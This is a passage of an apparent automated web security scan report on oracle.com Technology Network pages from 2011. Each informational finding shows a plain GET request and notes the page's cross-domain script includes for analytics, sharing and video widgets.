<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.192. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/berkeleydb/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/berkeleydb/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35925342414274979,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.193. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/enterprise-edition/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=273;ecid=35983324473649698,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.194. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/enterprise-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=235;ecid=41084439950149140,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 179935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.195. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/enterprise-edition/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=172;ecid=41037921159891880,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.196. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/express-edition/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/express-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35640160880236192,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.197. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/features/instant-client/index-097480.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/features/instant-client/index-097480.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35983345948486604,0:1)
Date: Tue, 06 Sep 2011 16:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129536

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.198. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/windows/downloads/index-101290.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/database/windows/downloads/index-101290.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41156226034626734,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 198382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.199. http://www.oracle.com/technetwork/dbadev/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/dbadev/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/dbadev/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40971220316785020,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.200. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/apex/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/developer-tools/apex/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41118116789228163,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.201. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/eclipse/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/developer-tools/eclipse/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=271;ecid=41051115299626626,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133089

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.202. http://www.oracle.com/technetwork/developer-tools/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/developer-tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=6;ecid=35935177889533234,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.203. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/jdev/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/developer-tools/jdev/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=270;ecid=41074600181168427,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.204. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/sql-developer/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/developer-tools/sql-developer/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=184;ecid=41076300987227916,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153665

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.205. http://www.oracle.com/technetwork/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=106;ecid=35926733983699874,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.206. http://www.oracle.com/technetwork/indexes/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/indexes/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/indexes/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=231;ecid=35678789816681054,0:1)
Date: Tue, 06 Sep 2011 16:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162281

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.207. http://www.oracle.com/technetwork/indexes/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/indexes/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/indexes/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=163;ecid=41075364684343375,0:1)
Date: Tue, 06 Sep 2011 16:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.208. http://www.oracle.com/technetwork/indexes/products/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/indexes/products/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/indexes/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41110647840983662,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.209. http://www.oracle.com/technetwork/java/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/java/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35928456265613448,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.210. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/fusion-middleware/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/middleware/fusion-middleware/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=12;ecid=41141262368570474,0:1)
Date: Tue, 06 Sep 2011 16:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.211. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/fusion-middleware/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/middleware/fusion-middleware/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116759579543136,0:1)
Date: Tue, 06 Sep 2011 16:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 173279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.212. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/fusion-middleware/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/middleware/fusion-middleware/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35984685978300754,0:1)
Date: Tue, 06 Sep 2011 16:09:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 184955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

